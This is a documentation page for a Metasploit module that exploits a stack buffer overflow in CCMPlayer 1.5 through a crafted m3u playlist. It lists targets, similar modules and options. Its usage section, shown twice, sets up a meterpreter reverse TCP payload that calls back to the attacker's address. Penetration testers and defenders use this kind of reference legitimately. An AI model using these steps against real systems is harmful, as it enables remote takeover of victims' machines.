CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow
This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening a m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an invalid read of an injectible address, thus allowing arbitrary code execution. This module works on multiple Windows platforms including: Windows XP SP3, Windows Vista, and Windows 7.
Exploit Rank
- Good
Exploit Authors
- Rh0 < >
Vulnerability References
Exploit Targets
- 0 - CCMPlayer 1.5 (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/ccmplayer_m3u_bof
msf exploit(ccmplayer_m3u_bof) > show payloads
msf exploit(ccmplayer_m3u_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ccmplayer_m3u_bof) > set LHOST [MY IP ADDRESS]
msf exploit(ccmplayer_m3u_bof) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/ccmplayer_m3u_bof
msf exploit(ccmplayer_m3u_bof) > show payloads
msf exploit(ccmplayer_m3u_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ccmplayer_m3u_bof) > set LHOST [MY IP ADDRESS]
msf exploit(ccmplayer_m3u_bof) > exploit
Exploit Module Options
| FILENAME | The file name. (default: msf.m3u) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |